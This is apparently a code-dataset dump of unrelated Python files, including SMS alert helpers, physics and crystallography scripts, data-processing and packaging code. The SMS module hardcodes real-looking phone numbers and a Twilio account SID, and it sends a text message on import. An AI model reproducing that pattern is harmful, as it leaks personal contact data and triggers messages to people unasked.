    url="https://git.ecmwf.int/projects/AVISO/repos/aviso/browse",
    author="ECMWF",
    packages=find_packages(),
    include_package_data=True,
    zip_safe=False,
    install_requires=INSTALL_REQUIRES,
    entry_points={},
)
| StarcoderdataPython |
4968682 | <reponame>leglars/ThinkingofYou<filename>AM-flask/app/send_sms.py
# from twilio.rest import TwilioRestClient
#
# account_sid = 'ACd7a0898f812377ef06121f8611f11b1e'
# auth_token = '<PASSWORD>'
# client = TwilioRestClient(account_sid, auth_token)
import plivo
import ENV_VAR as ENV
# Plivo REST credentials come from the local ENV_VAR module (kept out of VCS).
auth_id = ENV.PLIVO["id"]
auth_token = ENV.PLIVO["token"]
p = plivo.RestAPI(auth_id, auth_token)
# Numbers used throughout: admins receive warnings; the service number is the
# sender of every outbound SMS.
_ADMIN_NUMBER = "61478417108"
_ADMIN_LIST = ["61424945548", "61478417108"]
_SERVICE_NUMBER = "61429968959"
_TEST_QUESTION = "this is a test message from ThinkingofYou"
# Auto daily message start #####################################
def send_message(to_number=_ADMIN_NUMBER, question=_TEST_QUESTION):
    """Send an SMS from the service number via the Plivo REST API.

    Args:
        to_number: Destination phone number; defaults to the admin number.
        question: Message body; defaults to the test message.

    Returns:
        The Plivo response, a ``(status_code, payload_dict)`` tuple, e.g.::

            (202, {'message_uuid': ['...'],
                   'message': 'message(s) queued',
                   'api_id': '...'})
    """
    payload = {
        'src': _SERVICE_NUMBER,
        'dst': to_number,
        'text': question,
        'method': "POST",
    }
    return p.send_message(payload)
def reply_message(from_number, text="Thanks, we've received your message.", to_number=_SERVICE_NUMBER):
    """Reply to an inbound SMS.

    Args:
        from_number: Number that sent the inbound message (reply target).
        text: Reply body; defaults to a generic acknowledgement.
        to_number: Service number to reply from. Kept as a parameter so a
            deployment with several service numbers can pick the right one.

    Returns:
        The Plivo response tuple.
    """
    payload = dict(src=to_number, dst=from_number, text=text, method="POST")
    return p.send_message(payload)
def error_response_warning(error, user, name, question):
    """Warn the admin that a contact's reply to a question looks invalid.

    Args:
        error: The raw (suspicious) response text.
        user: Username owning the contact.
        name: The contact's name.
        question: The question that was asked.

    Returns:
        The Plivo response tuple from sending the warning.
    """
    error_body = "User " + user + "'s contact " + name + " may arouse a wrong response for question " + question \
                 + "\nThe response is here: " + error
    # BUGFIX: the warning was assembled but never sent (the send call was
    # commented out, leaving this function a no-op); dispatch it to the
    # admin number like the other error helpers do.
    return send_message(_ADMIN_NUMBER, error_body)
def error_response_number(text, number):
    """Notify every admin about a reply arriving from an unknown number."""
    alert = ("Get a response from an unknown number: " + number +
             "\nThe content is here: " + text)
    for admin in _ADMIN_LIST:
        send_message(admin, alert)
def error_logging_fail(text, number):
    """Warn the admin that an inbound message could not be logged."""
    alert = "WARNING: logging fail\nNumber: " + number + "\nContent: " + text
    send_message(_ADMIN_NUMBER, alert)
# Auto daily message End ###################################################
# TOY message start ########################################################
def send_toy_message(contact_name, username, to_number=_ADMIN_NUMBER):
    """Deliver a "Thinking of You" SMS from *username* to *contact_name*."""
    body = ("I'm Thinking of You, " + contact_name +
            "!\n-- A message from " + username)
    return send_message(to_number, body)
def error_toy_message_sending_fail(username, to_number=_ADMIN_NUMBER):
    """Alert the admin that a user's toy-message POST failed."""
    alert = "WARNING: " + username + " can't send toy message, post function failure!"
    return send_message(to_number, alert)
def error_toy_email_sending_fail(email, to_number=_ADMIN_NUMBER):
    """Alert the admin that an email address could not be reached."""
    alert = "WARNING: " + email + " can't be reached!"
    return send_message(to_number, alert)
def error_device_page_hidden(username, to_number=_ADMIN_NUMBER):
    """Alert the admin that a user's page has become hidden."""
    alert = "WARNING: " + username + "'s page be hidden!"
    return send_message(to_number, alert)
# NOTE(review): this fires a real SMS as a module-level side effect every time
# the module is imported -- confirm whether it is a leftover one-off that
# should be removed or moved behind an ``if __name__ == '__main__':`` guard.
send_message("61418150854", "Have you had any contact with Roy today Y/N. Sorry for the delay on first day. The program has something wrong because a new change be added today.")
| StarcoderdataPython |
339830 | <gh_stars>100-1000
from __future__ import absolute_import, division, print_function
from six.moves import range
# LIBTBX_SET_DISPATCHER_NAME xpp.beamcenter
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT=1
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export BOOST_ADAPTBX_FPE_DEFAULT=1
import sys,os
from scitbx.array_family import flex
from scitbx.matrix import sqr, col
from math import sin, cos, pi
import dxtbx
from xfel.metrology.legacy_scale import quadrant_self_correlation
import libtbx.phil
master_phil = libtbx.phil.parse("""
beam_center_fast = None
.type = int
.help = Initial estimate of beam center (fast coordinate)
beam_center_slow = None
.type = int
.help = Initial estimate of beam center (slow coordinate)
px_max = None
.type = int
.help = Only test pixels this distance or less from the initial beam center estimate
px_min = None
.type = int
.help = Only test pixels this distance or more from the initial beam center estimate
show_plots = False
.type = bool
.help = If True, show the pixels that will be tested and the rotational self-correlations from the grid search
""")
if (__name__ == "__main__"):
  # File arguments are images; everything else is treated as PHIL overrides.
  files = [arg for arg in sys.argv[1:] if os.path.isfile(arg)]
  arguments = [libtbx.phil.parse(arg) for arg in sys.argv[1:] if not os.path.isfile(arg)]
  params = master_phil.fetch(sources=arguments).extract()
  # 2x2 rotation matrix for a 45-degree rotation, used for self-correlation.
  rot45 = sqr((sin(pi/4.),-cos(pi/4.),cos(pi/4.),sin(pi/4.)))
  for file in files:
    message="""Based on the file %s, this program will compute incremental translations to circularize
powder rings. The algorithm scores based on self-correlation upon 45-degree rotation.
Increments are determined ON TOP OF beam center value in image header. Output is given in the form of
delta to that value."""%file
    print(message)
    img = dxtbx.load(file)
    beam = img.get_beam()
    s0 = beam.get_s0()
    raw_data = img.get_raw_data()
    # Normalize to a tuple so single-panel detectors look like multi-panel.
    if not isinstance(raw_data, tuple):
      raw_data = (raw_data,)
    for panel_id, panel in enumerate(img.get_detector()):
      beam_center = col(panel.get_beam_centre_px(s0))
      data = raw_data[panel_id]
      print("Assembling mask...", end=' '); sys.stdout.flush()
      mask = panel.get_trusted_range_mask(data)
      trusted_min = panel.get_trusted_range()[0]
      mask_center = col((params.beam_center_slow,params.beam_center_fast))
      px_max = params.px_max
      px_min = params.px_min
      # Crop to a window of +/- px_max pixels around the estimated center.
      data = data[mask_center[0] - px_max:mask_center[0] + px_max, mask_center[1] - px_max:mask_center[1] + px_max]
      mask = mask[mask_center[0] - px_max:mask_center[0] + px_max, mask_center[1] - px_max:mask_center[1] + px_max]
      panel_origin = col((mask_center[0] - px_max,mask_center[1] - px_max))
      # Keep only pixels inside the annulus [px_min, px_max] from the center.
      for y in range(mask.focus()[1]):
        for x in range(mask.focus()[0]):
          l = (col((x-px_max+mask_center[0],y-px_max+mask_center[1])) - mask_center).length()
          if l < px_min or l > px_max:
            mask[x,y] = False
      # Flag masked-out pixels with a below-trusted value so they are ignored.
      data.set_selected(~mask, trusted_min-1)
      print("done")
      if params.show_plots:
        from matplotlib import pyplot as plt
        plt.imshow(data.as_numpy_array())
        plt.show()
      # Grid-search candidate beam centers within +/- grid_radius pixels,
      # scoring each by the correlation of the image with its 45-deg rotation.
      grid_radius = 20
      mapp = flex.double(flex.grid(2*grid_radius+1, 2*grid_radius+1))
      print(mapp.focus())
      gmax = 0.0
      coordmax = (0,0)
      for xi in range(-grid_radius, grid_radius+1):
        for yi in range(-grid_radius, grid_radius+1):
          test_bc = beam_center + col((xi,yi))
          print("Testing beam center", test_bc.elems, end=' ')
          REF,ROT = quadrant_self_correlation(data,panel_origin,test_bc,rot45,trusted_min)
          CCRR = flex.linear_correlation(REF,ROT)
          VV = CCRR.coefficient()
          if VV>gmax:
            gmax = VV
            coordmax = col((xi,yi))
          mapp[(xi+grid_radius,yi+grid_radius)]=VV
          print(VV)
      print("max cc %7.4F is at "%gmax, (beam_center + coordmax).elems, "(slow, fast). Delta:", coordmax.elems)
      if params.show_plots:
        npy = mapp.as_numpy_array()
        from matplotlib import pyplot as plt
        plt.imshow(npy, cmap="hot")
        plt.plot([coordmax[1]+grid_radius],[coordmax[0]+grid_radius],"k.")
        plt.show()
| StarcoderdataPython |
11316149 | <reponame>smartalecH/BYUqot<gh_stars>1-10
# Material dispersion example, from the Meep tutorial. Here, we simply
# simulate homogenous space filled with a dispersive material, and compute
# its modes as a function of wavevector k. Since omega/c = k/n, we can
# extract the dielectric function epsilon(omega) = (ck/omega)^2.
from __future__ import division
# Get project library path to import library files
import sys
import os
d = os.path.dirname(os.getcwd())
libPath = os.path.abspath(os.path.join(d, 'lib'))
sys.path.insert(0, libPath)
import meep as mp
import SiP_Materials
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
# Speed of light in vacuum, m/s
c = 3e8
# default unit length is 1 um
um_scale = 1.0
# NOTE(review): the material below is labelled SiO2, yet the experimental
# data and comments refer to silicon -- confirm which material is intended.
SiO2_range = mp.FreqRange(min=1/1.77, max=1/0.25)
SiO2_frq1 = 1/(0.103320160833333*um_scale)
SiO2_gam1 = 0#1/(12.3984193000000*um_scale)
SiO2_sig1 = 1.12
SiO2_susc = [ mp.LorentzianSusceptibility(frequency=SiO2_frq1, gamma=SiO2_gam1, sigma=SiO2_sig1) ]
SiO2 = mp.Medium(epsilon=1.0, E_susceptibilities=SiO2_susc, valid_freq_range=SiO2_range)
# ---------------------------------------------------------------------------- #
# Let's view silicon's theoretical refractive index plot
# ---------------------------------------------------------------------------- #
# Data from Lukas's handbook
eps = 1
eps_lorentz = SiO2_sig1
# Resonance angular frequency in rad/s (frequency unit is 1/um -> *1e6).
omega0 = 2*np.pi*3e8*SiO2_frq1*1e6
print(omega0)
delta0 = 0
# Generate data to plot over valid range
lambdaMin = 0.25e-6
lambdaMax = 1.77e-6
lambdaN = 100
lambdaPlot = np.linspace(lambdaMin,lambdaMax,lambdaN)
num = eps_lorentz * (omega0**2)
den = (omega0**2 - 2*1j*delta0*2*np.pi * c / lambdaPlot - (2*np.pi*c/lambdaPlot)**2)
#epsilonTheory = eps + num / den
# Lorentz-oscillator permittivity as a function of wavelength in microns.
epsLam = lambda x: eps + (eps_lorentz * (omega0**2)) / ((omega0**2 - 2*1j*delta0*2*np.pi * c / (x*1e-6) - (2*np.pi*c/(x*1e-6))**2))
epsilonTheory = epsLam(lambdaPlot*1e6)
# ---------------------------------------------------------------------------- #
# Let's load experimental data
# ---------------------------------------------------------------------------- #
# Reference:
# <NAME>. Refractive index of silicon and germanium and its wavelength and
# temperature derivatives, J. Phys. Chem. Ref. Data 9, 561-658 (1993)
filename = 'SiData.csv'
expdata = np.genfromtxt(fname=filename,delimiter=',',skip_header=1)
# ---------------------------------------------------------------------------- #
# Let's simulate the w-k plot and eps plot
# ---------------------------------------------------------------------------- #
# Now let's rearrange the data to the form Meep uses
cell = mp.Vector3()
resolution = 30
fcen = 1
df = 4
sources = [mp.Source(mp.GaussianSource(fcen, fwidth=df), component=mp.Ez, center=mp.Vector3())]
# NOTE(review): kmin uses 1/1.7 while the material's valid range starts at
# 1/1.77 -- confirm whether this is a typo.
kmin = 1/1.7
kmax = 1/0.25
k_interp = 10
kpts = mp.interpolate(k_interp, [mp.Vector3(kmin), mp.Vector3(kmax)])
sim = mp.Simulation(
    cell_size=cell,
    geometry=[],
    sources=sources,
    default_material=SiO2,
    resolution=resolution
)
# Extract out omega from each k vector
all_freqs = sim.run_k_points(300, kpts) # a list of lists of frequencies
print(all_freqs)
# Get wavelength data in microns
k = np.asarray([v.x for v in kpts])
# Get Omega
f = np.asarray([v[0] for v in all_freqs])
lambdaEst = 1 / k
# Get refractive index info: omega/c = k/n  =>  n = k/f (in Meep units).
n_meep = k/f
err = abs(np.sqrt(epsLam(lambdaEst)) - n_meep) / np.sqrt(epsLam(lambdaEst)) * 100
print('Error:')
print(err)
# ---------------------------------------------------------------------------- #
# Plot data
# ---------------------------------------------------------------------------- #
# NOTE: Axes.hold() was deprecated in matplotlib 2.0 and removed in 3.0;
# successive plot() calls accumulate on the same axes by default, so the
# plt.hold(True) calls were removed.
plt.plot(lambdaPlot*1e6, np.sqrt(epsilonTheory))
plt.plot(lambdaEst, n_meep, 'o')
plt.xlim(lambdaMin*1e6, lambdaMax*1e6)
plt.xlabel(r'Wavelength ($\mu m$)')
plt.ylabel('Index of Refraction')
plt.show()
| StarcoderdataPython |
5084822 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from infra.libs.gerrit_api.gerrit_api import (
AccessViolationException, Gerrit, RevisionConflictException,
UnexpectedResponseException)
from infra.libs.gerrit_api.credentials import (
Credentials, CredentialsException, GitcookiesException, NetrcException,
get_default_credentials, get_default_gitcookies_path,
get_default_netrc_path, load_netrc_file, load_gitcookie_file)
| StarcoderdataPython |
5084535 | # To use the instance return type from static methods
from __future__ import annotations
from datetime import datetime
from pathlib import Path
from toolz import curry, partition_all, get
from typing import Mapping, Union, Iterator
from uuid import UUID
from uuid import uuid4
from mmlp.Config import Config
from mmlp.data import Method
from mmlp.data import ModelSnapshot
from mmlp.endpoint.compute.utils import transform_dataclass_to_dict
from mmlp.manager.utils.utils import load_objects_from_storage
from mmlp.utils import ensure_uuid, excepting_pipe
from mmlp.utils.utils import write_json_file
class MethodManager:
    """In-memory registry of ``Method`` objects, persisted as JSON on disk."""
    def __init__(self, config: Config, methods: Mapping[UUID, Method]):
        self._config: Config = config
        self._methods: Mapping[UUID, Method] = methods
        if hasattr(self._methods, "keys"):
            print(f'MethodManager: Loaded {len(self._methods.keys())} methods')
        else:
            print("FATAL MethodManager: Could not load methods, sorry :(")
    @staticmethod
    def load(config: Config) -> MethodManager:
        """Build a manager by scanning ``config.model_base_dir`` for methods."""
        # print(f'MethodManager: Loading models from: {config.model_base_dir}')
        return MethodManager(config=config,
                             methods=load_objects_from_storage(metadata_filename=config.method_filename,
                                                               class_factory=Method,
                                                               root_directory=config.model_base_dir))
    def create_method(self, name: str, description: str, snap: ModelSnapshot) -> Union[Exception, Method]:
        """Create and persist a new method for *snap*.
        Returns the new ``Method``, or an ``Exception`` when one already
        exists for this snapshot.
        """
        if (Path(snap.storage_path) / self._config.method_filename).exists():
            return Exception("create_method", "A method for this snapshot already exist.")
        # create method object
        method = Method.from_dict(dict(
            id=uuid4(),
            name=name,
            created=str(datetime.now()),
            description=description,
            model_snapshot=snap
        ))
        # Create method on filesystem
        write_json_file(str(Path(snap.storage_path) / self._config.method_filename),
                        transform_dataclass_to_dict(method))
        # add method object
        self._methods[method.id] = method
        return method
    def remove_method(self, method: Method) -> Union[Exception, Method]:
        """Delete *method*'s metadata file and drop it from the registry.
        NOTE(review): unlike the sibling methods, this *raises* for an
        unknown id instead of returning the Exception -- confirm which
        contract callers expect.
        """
        if not self._methods.get(method.id, None):
            raise Exception("remove_method", f"Method {method.id} is not known")
        # Remove the method file from filesystem
        # Only delete the method (snapshot is still there)!
        (Path(method.model_snapshot.storage_path) / self._config.method_filename).unlink()
        # Remove object from collection
        self._methods.pop(method.id)
        return method
    def get_method(self, method_id: UUID) -> Union[Exception, Method]:
        """Look up a method by id; returns an ``Exception`` when missing."""
        method = self._methods.get(ensure_uuid(method_id))
        return method if method else Exception(f'method: {method_id} not found')
    def list_methods(self, query: dict) -> Iterator[Method]:
        """
        List all methods
        :param query: dict with 'sortby', 'order', 'limit', 'offset' keys
        :return: the requested page of methods (sorted, partitioned)
        """
        return excepting_pipe(
            self._methods.values(),
            curry(sorted, key=lambda x: getattr(x, query['sortby']), reverse=query['order']),
            curry(partition_all)(query['limit'] if query['limit'] > 0 else len(self._methods.values())),
            list,
            curry(get, default=[])(query['offset'])
        )
    def count_methods(self) -> int:
        """Return the number of registered methods."""
        return len(self._methods)
| StarcoderdataPython |
11231177 | import numpy as np
from tqdm import tqdm
import pandas as pd
import uproot
from sklearn.preprocessing import MinMaxScaler
# Input ntuple and tree; the whole file is streamed in chunks below.
Run2_MC = '/eos/lhcb/wg/FlavourTagging/tuples/development/IFT/data_Feb2021/fttuple_data_2016_28r2_TrT.root'
tree = 'Bd2JpsiKstarDetached/DecayTree'
# there are two indexes in this data-set: B-candidate index (main index) and dependent one called B_len, this is the track index
br_l = uproot.open(Run2_MC)[tree].keys()
# get all Features which start with "Tr_"
tr_l = [x for x in br_l if x.startswith("Tr_")]
# get all Features which start with "B_"
b_vars = [ x for x in br_l if x.startswith("B_")]
print('Number of columns: '+str(len(b_vars)))
# NOTE(review): `scaler` (and `tr_l` above) are never used afterwards --
# confirm whether scaling was meant to be applied before pickling.
scaler = MinMaxScaler()
events = uproot.open(Run2_MC+':'+ tree )
i = 0
# run over the data set in chnuk of 200 MB to reduce the load on the RAM, delete the df after saving it at the end of the loop:
for df in events.iterate(step_size="200 MB", expressions= b_vars, library="pd"):
    # cast to reduce the size of the output file:
    df[df.select_dtypes(bool).columns] = df.select_dtypes(bool).astype('int32')
    df[df.select_dtypes('float64').columns] = df.select_dtypes('float64').astype('float32')
    df[df.select_dtypes('int64').columns] = df.select_dtypes('int64').astype('int32')
    df[df.select_dtypes(object).columns] = df.select_dtypes(object).astype('float32')
    #print(df.dtypes)
    # let us start the juggling !! :
    # to select in basis of a given index (here we would like to select based on track feature ) we follow two step procedure:
    #1- explode everything to be dependent on the track index
    df = df.apply( lambda x: x.explode() if x.name.startswith("Tr_") else x)
    #2- Select :
    df = df.query('(Tr_T_AALLSAMEBPV==1 | Tr_T_BPVIPCHI2>6) & Tr_T_TRGHOSTPROB<0.35 & Tr_T_P>2000 & B_DIRA_OWNPV>0.9995')
    # build additonal features :
    df['Tr_T_diff_z'] = df['B_OWNPV_Z'] - df['Tr_T_TrFIRSTHITZ']
    df['Tr_T_cos_diff_phi'] = np.cos( df['B_LOKI_PHI'] - [y for y in df['Tr_T_Phi']] )
    df['Tr_T_diff_eta'] = df['B_LOKI_ETA'] - [y for y in df['Tr_T_Eta'] ]
    df['Tr_T_P_proj'] = [np.vdot(x,y) for x, y in zip(df[['B_PX', 'B_PY', 'B_PZ', 'B_PE']].values, df[['Tr_T_PX', 'Tr_T_PY', 'Tr_T_PZ', 'Tr_T_E']].values)]
    # now we go back to the b-candidate index :
    df = df.set_index([df.index,'B_len'])
    # we would like to choose the first 40 track with the highest pT (and remove the other entries per B-candidate index).
    # here is how it is done:
    # 1- simply sort the valuies
    # NOTE(review): the comment says "highest pT" but the sort key is
    # Tr_T_AALLSAMEBPV -- confirm the intended ranking variable.
    df = df.sort_values('Tr_T_AALLSAMEBPV',ascending=False).sort_index(level=0)
    # 2- use groupby and head combination to chop any other track which is not in the set of "first 40 highest pT"
    df = df.groupby(level=0).head(40)
    # pickle everything :
    # NOTE(review): `suffix` is never defined anywhere in this script -- the
    # next line raises NameError at runtime; define `suffix` before use.
    df.to_pickle('/eos/lhcb/user/b/bkhanji/FT/MC/Bd2JpsiKst_' + suffix + '_fltrd_'+str(i)+'.pkl')
    i = i+1
    #print(df)
    # we are done !
    del df
| StarcoderdataPython |
5198047 | <gh_stars>0
#!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
requirements = [
'Click>=7.0',
'gevent>=1.4.0',
'jsonobject>=0.9.9',
'sh>=1.0.9',
'PyYAML>=5.1',
'contextlib2>=0.5.5',
]
setup_requirements = ['pytest-runner', ]
setup(
author="Dimagi",
author_email='<EMAIL>',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
description="Utility tool for building Git branches my merging multiple other branches together.",
entry_points={
'console_scripts': [
'git-build-branch=git_build_branch.branch_builder:main',
'safe-commit-files=git_build_branch.safe_commit_files:main',
],
},
install_requires=requirements,
license="BSD license",
long_description=readme,
include_package_data=True,
keywords='git-build-branch',
name='git-build-branch',
packages=find_packages(include=['git_build_branch', 'git_build_branch.*']),
setup_requires=setup_requirements,
url='https://github.com/dimagi/git-build-branch',
version='0.1.13',
zip_safe=False,
)
| StarcoderdataPython |
5081528 | import pandas as pd
import argparse
from matplotlib_venn import venn3
import matplotlib.pyplot as plt
import math
def get_args():
    """Build the CLI parser and return the parsed argument namespace.

    Options: three splice-junction files with display names, a sample
    name, and an optional flag to log-scale the venn circle sizes.
    """
    desc = 'Given sj files, see which splice junctions are shared/unique between datasets'
    parser = argparse.ArgumentParser(description=desc)
    # The three input files share the same option shape; build them in a loop.
    for idx, nth in enumerate(('1st', '2nd', '3rd'), start=1):
        parser.add_argument('-sj_%d' % idx, dest='sj_%d' % idx,
                            help='%s splice junction file' % nth)
        parser.add_argument('-sj_%d_name' % idx, dest='sj_%d_name' % idx,
                            help='%s splice junction file sample name ie "Gencode"' % nth)
    parser.add_argument('-sample', dest='sample_name',
                        help='Sample name ie "PacBio GM12878"')
    parser.add_argument('--log', dest='log_sizes', default=False,
                        action='store_true',
                        help='Log the sizes of the circles')
    return parser.parse_args()
def read_sj_file(infile, dtype):
    """Load a tab-separated splice-junction table into a DataFrame.

    Only the first four columns are kept and named chrom/start/stop/strand.
    The ``dtype`` argument (the dataset's display name at the call sites)
    is accepted for call-site symmetry but is not used here.
    """
    columns = ['chrom', 'start', 'stop', 'strand']
    sj_df = pd.read_csv(infile, sep='\t', names=columns, usecols=[0, 1, 2, 3])
    return sj_df
def find_intersect_counts(dfa, dfb, dfc, args):
    """Compute the seven exclusive region sizes of a three-way venn diagram.

    Junctions are matched on (chrom, start, stop, strand). Returns
    ``(counts, labels)`` where ``counts`` is ordered for matplotlib_venn's
    ``venn3``: (only-a, only-b, a&b, only-c, a&c, b&c, a&b&c) and ``labels``
    carries the three user-supplied dataset names.
    """
    key = ['chrom', 'start', 'stop', 'strand']
    # Each pairwise intersection is needed twice below (for the pair-only
    # count and, for a&b, for the triple), so compute each merge once.
    ab = pd.merge(dfa, dfb, how='inner', on=key)
    ac = pd.merge(dfa, dfc, how='inner', on=key)
    bc = pd.merge(dfb, dfc, how='inner', on=key)
    # intersection of all (a,b,c)
    count_abc = len(pd.merge(ab, dfc, how='inner', on=key).index)
    # pairwise intersections, excluding the triple overlap
    count_ab = len(ab.index) - count_abc
    count_ac = len(ac.index) - count_abc
    count_bc = len(bc.index) - count_abc
    # unique to each dataset: total minus every shared region
    count_a = len(dfa.index) - count_ab - count_ac - count_abc
    count_b = len(dfb.index) - count_ab - count_bc - count_abc
    count_c = len(dfc.index) - count_ac - count_bc - count_abc
    counts = (count_a, count_b, count_ab, count_c, count_ac, count_bc, count_abc)
    labels = (args.sj_1_name, args.sj_2_name, args.sj_3_name)
    return counts, labels
def main():
    """CLI entry point: read three splice-junction tables, compute their
    three-way overlap counts, and save a labeled venn diagram under figures/."""
    args = get_args()
    # read in each of the sj dfs
    pb_df = read_sj_file(args.sj_1, args.sj_1_name)
    print(pb_df.head())
    print('long-read df')
    print(len(pb_df.index))
    ont_df = read_sj_file(args.sj_2, args.sj_2_name)
    print(ont_df.head())
    print(len(ont_df.index))
    ill_df = read_sj_file(args.sj_3, args.sj_3_name)
    print(ill_df.head())
    print(len(ill_df.index))
    # get each of the intersection counts that we care about
    counts, labels = find_intersect_counts(pb_df, ont_df, ill_df, args)
    # change circle sizes
    # With --log the circle areas use log2 of the counts while the raw
    # values are kept as string labels. NOTE(review): log2(0) would raise
    # on an empty region — presumably all seven regions are non-zero in
    # practice; confirm with real inputs.
    if args.log_sizes:
        intersection_labels = tuple([str(i) for i in counts])
        counts = tuple([math.log2(i) for i in counts])
    print(counts)
    print(labels)
    # plot the venn diagram
    plt.figure(figsize=(8.5,8.5))
    v = venn3(subsets=counts, set_labels=('A', 'B', 'C'))
    # messing with label text
    # Replace the placeholder A/B/C set labels with the user-supplied names.
    v.get_label_by_id('A').set_text(args.sj_1_name)
    v.get_label_by_id('B').set_text(args.sj_2_name)
    v.get_label_by_id('C').set_text(args.sj_3_name)
    v.get_label_by_id('A').set_fontsize('x-large')
    v.get_label_by_id('B').set_fontsize('x-large')
    v.get_label_by_id('C').set_fontsize('x-large')
    plt.title('{} Splice Junction Support'.format(args.sample_name), fontsize='xx-large')
    # messing with numerical text
    v.get_label_by_id('100').set_fontsize('x-large')
    v.get_label_by_id('010').set_fontsize('x-large')
    v.get_label_by_id('001').set_fontsize('x-large')
    v.get_label_by_id('110').set_fontsize('x-large')
    v.get_label_by_id('101').set_fontsize('x-large')
    v.get_label_by_id('011').set_fontsize('x-large')
    v.get_label_by_id('111').set_fontsize('x-large')
    # When circle sizes were log-scaled, restore the raw counts as the
    # per-region number labels so the figure still reads literally.
    if args.log_sizes:
        v.get_label_by_id('100').set_text(intersection_labels[0])
        v.get_label_by_id('010').set_text(intersection_labels[1])
        v.get_label_by_id('001').set_text(intersection_labels[3])
        v.get_label_by_id('110').set_text(intersection_labels[2])
        v.get_label_by_id('101').set_text(intersection_labels[4])
        v.get_label_by_id('011').set_text(intersection_labels[5])
        v.get_label_by_id('111').set_text(intersection_labels[6])
    plt.savefig('figures/'+args.sample_name.replace(' ','_')+'_venn.pdf')
    plt.savefig('figures/'+args.sample_name.replace(' ','_')+'_venn.png', dpi = 600)
# Run the CLI only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| StarcoderdataPython |
6532727 | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
import logging
import os
import traceback

from sis_provisioner.dao.pws import get_person
from sis_provisioner.dao.hrp import get_worker
from sis_provisioner.util.log import log_exception
from sis_provisioner.util.settings import (
    get_csv_file_name_prefix, get_csv_file_size)
from sis_provisioner.csv import get_aline_csv, open_file
from sis_provisioner.csv.user_formatter import get_attr_list, get_headers
# Module-level logger named after this module.
logger = logging.getLogger(__name__)
def get_user_file_name(filepath, index):
    """Return the full path of the numbered user CSV chunk under filepath."""
    file_name = '{0}{1}.csv'.format(get_csv_file_name_prefix(), index)
    return os.path.join(filepath, file_name)
def make_import_user_csv_files(uw_accounts,
                               filepath):
    """
    Write the importable user records in uw_accounts to one or more CSV
    files under filepath, at most get_csv_file_size() records per file.

    :param uw_accounts: a list of UwAccount objects
    :param filepath: directory in which the CSV files are created
    Writes all csv files. Returns number of records wrote out.
    """
    if not uw_accounts or len(uw_accounts) == 0:
        return 0
    file_size = get_csv_file_size()
    total_users = len(uw_accounts)
    f_index = 1
    user_number = 0
    csv_headers = get_aline_csv(get_headers())
    f = open_file(get_user_file_name(filepath, f_index))
    # try/finally guarantees the current chunk file is closed even if an
    # unexpected error escapes the loop (the original leaked the handle).
    try:
        f.write(csv_headers)
        for uw_account in uw_accounts:
            # Skip disabled or termination-scheduled accounts.
            if uw_account.disabled or uw_account.has_terminate_date():
                continue
            person = get_person(uw_account.netid)
            if (person is None or person.is_test_entity or
                    not person.is_emp_state_current()):
                continue
            if person.uwnetid != uw_account.netid:
                logger.error("OLD netid, Skip {0}".format(uw_account))
                continue
            aline = get_aline_csv(get_attr_list(person, get_worker(person)))
            try:
                f.write(aline)
            except Exception:
                # Fixed: 'traceback' was referenced here without being
                # imported, turning any write failure into a NameError.
                log_exception(
                    logger,
                    "{0:d}th file: ({1}), Skip!".format(f_index, aline),
                    traceback.format_exc())
                continue
            user_number += 1
            # Roll over to the next chunk file once the current one is full
            # and there are still accounts left to process.
            if user_number < total_users and (user_number % file_size) == 0:
                f.close()
                logger.info("Finish writing {0:d} entries.".format(user_number))
                f_index += 1
                f = open_file(get_user_file_name(filepath, f_index))
                f.write(csv_headers)
    finally:
        f.close()
    logger.info("Finish writing {0:d} entries.".format(user_number))
    return user_number
| StarcoderdataPython |
3253745 | from vk.types.events.community.events_list import Event
from vk.bot_framework.dispatcher.rule import BaseRule
from vk import types
import typing
import logging
import asyncio
# Module-level logger named after this module.
logger = logging.getLogger(__name__)
class SkipHandler(Exception):
    # NOTE(review): control-flow exception; presumably raised inside a
    # handler to skip it and let dispatching continue — its raiser/catcher
    # are not in this module, so confirm against the dispatcher code.
    pass
class Handler:
    """Binds an event type to a handler coroutine guarded by a list of rules."""

    def __init__(
        self, event_type: Event, handler: typing.Callable, rules: typing.List[BaseRule]
    ):
        self.event_type: Event = event_type
        self.handler: typing.Callable = handler
        self.rules: typing.List[BaseRule] = rules

    async def execute_handler(self, *args):
        """Run the handler if every rule accepts the event.

        args is (event, data); rules are awaited with the event only.
        Returns True when the handler ran, False when a rule rejected it
        (the original fell through and returned None in that case).
        """
        if self.rules:
            for rule in self.rules:
                # All rules must pass; stop at the first rejection.
                if not await rule(args[0]):
                    return False
        await self.handler(*args)
        return True
| StarcoderdataPython |
3242288 | <reponame>RosettaCommons/jade2<filename>jade2/basic/sequence/SequenceInfo.py
#<NAME>
class SequenceInfo:
    """
    Simple class for holding + accessing sequence metadata.

    A region string "start:end:chain" maps the stored sequence onto PDB
    numbering; without a region, residue numbers are 1-based (Rosetta).
    Original class for sequence info. Basically deprecated by SequenceStats
    and PDBConsensusInfo.
    """
    def __init__(self):
        self.start = None     # first PDB residue number of the region
        self.end = None       # last PDB residue number of the region
        self.chain = None     # chain ID of the region
        self.sequence = None  # one-letter-code sequence string
        self.region = None    # raw "start:end:chain" region string
        # Fixed: accessors use 'pdbID' (capital ID) but the original
        # initialized the unused lowercase 'pdbid', so get_pdbID() raised
        # AttributeError before set_pdbID() was ever called.
        self.pdbID = None
        self.pdbpath = None   # path to the source PDB file

    def get_sequence(self):
        return self.sequence

    def get_length(self):
        return len(self.sequence)

    def get_pdbID(self):
        return self.pdbID

    def get_pdbpath(self):
        return self.pdbpath

    def get_region(self):
        return self.region

    def get_start_residue(self):
        return self.start

    def get_end_residue(self):
        return self.end
